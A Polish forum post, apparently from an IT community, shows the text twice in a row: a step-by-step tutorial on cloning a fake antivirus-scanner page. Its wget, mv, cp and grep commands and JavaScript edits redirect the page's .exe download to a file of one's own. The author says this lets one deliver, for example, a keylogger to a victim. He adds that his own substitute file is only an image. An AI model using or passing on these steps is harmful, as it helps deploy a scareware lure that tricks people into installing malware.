RobertG
Użytkownik
- Dołączył
- Styczeń 3, 2007
- Posty
- 391
Intro
Ponoć jest masa stron phishingowych i ogólnie niebezpiecznych, jeżeli znajdziemy jakąś w necie możemy ją przerobić dla swoich potrzeb (czyli by np. podesłać komuś keyloggera). Takie stronki są przygotowane przez 'specjalistów' więc wyglądają dość profesjonalnie i są pomysłowe. O ile nie jestem zwolennikiem czegoś takiego, to dla czystej ciekawości sprawdziłem, jak to zrobić.
Jak?
Zakładam, że czytelnik korzysta z Linuksa
Ja przerobiłem (strona nachalnie próbuje zainstalować (pewnie syfny) soft - nie klikaj jak się boisz) fake ze stronki:
http://antivirus-scanner.com/1/?xx=1&in=2&h=1
Trzeba ściągnąć kompletną stronę z plikami js, css, obrazkami etc. na dysk (wget pod linuksem):
Parametry przekazywane do index.html nie są potrzebne, wywalmy to z nazwy:
Uporządkujmy pliki, by był w jednym katalogu (dla estetyki):
Teraz, trzeba zmienić URL do tego pliku, tak by był poprawny - w index.html w linijce 22 zmieńmy na:
OK, całość działa i oryginalnie wyglada, musimy jednak zmienić go tak, by serwował ofierze to co my chcemy, poszukajmy, gdzie jest odniesienie do pliku exe, który ma być ściagany:
otrzymamy:
trzeba zmienić linijkę 108,109, na URL do naszego pliku exe:
na np:
Podsumowanie
Chodziło mi o to, że czyiś fake można przerobić/przeanalizować według uznania. Taki fake wygląda znacznie lepiej niż robiony od podstaw przez siebie (chyba). Nie trzeba przy tym analizować działania skryptu, wystarczy sie skupić na tym, co przerobić 'by działało u mnie'.
Tu jest moja przeróbka (ściągany plik jest OK, to tak na prawdę obrazek):
http://rgawron.megiteam.pl/testy/antivirus...om/1/index.html
Ponoć jest masa stron phishingowych i ogólnie niebezpiecznych, jeżeli znajdziemy jakąś w necie możemy ją przerobić dla swoich potrzeb (czyli by np. podesłać komuś keyloggera). Takie stronki są przygotowane przez 'specjalistów' więc wyglądają dość profesjonalnie i są pomysłowe. O ile nie jestem zwolennikiem czegoś takiego, to dla czystej ciekawości sprawdziłem, jak to zrobić.
Jak?
Zakładam, że czytelnik korzysta z Linuksa
http://antivirus-scanner.com/1/?xx=1&in=2&h=1
Trzeba ściągnąć kompletną stronę z plikami js, css, obrazkami etc. na dysk (wget pod linuksem):
Kod:
wget --mirror [url]http://antivirus-scanner.com/1/?xx=1&in=2&h=1[/url]
Kod:
mv index.html\?xx\=1 index.html
Kod:
cp ../common/destrub.php\?ag\=false\&xx\=1\&end\=false\&g\=false\&in\=0\&h\=0 ./engine.js
Kod:
<script type="text/javascript" src="./engine.js"></script>
Kod:
grep -nR exe *
Kod:
engine.js:109:var dlink_exe = "/download/CleanerInstall.exe";
index.html:194: Name: AtnvrsInstall.exe
script.js:95: var myWin = window.open("http://antivirus-scanner.com/download/AtnvrsInstall.exe");
script.js:98: downloadLink.document.location = "http://antivirus-scanner.com/download/AtnvrsInstall.exe";trzeba zmienić linijkę 108,109, na URL do naszego pliku exe:
Kod:
108 var dlink = "/download/";
109 var dlink_exe = "/download/CleanerInstall.exe";
Kod:
108 var dlink = "/testy/antivirus-scanner.com/1/logo.exe";
109 var dlink_exe = '/testy/antivirus-scanner.com/1/logo.exe'//"/download/CleanerInstall.exe";Podsumowanie
Chodziło mi o to, że czyiś fake można przerobić/przeanalizować według uznania. Taki fake wygląda znacznie lepiej niż robiony od podstaw przez siebie (chyba). Nie trzeba przy tym analizować działania skryptu, wystarczy sie skupić na tym, co przerobić 'by działało u mnie'.
Tu jest moja przeróbka (ściągany plik jest OK, to tak na prawdę obrazek):
http://rgawron.megiteam.pl/testy/antivirus...om/1/index.html
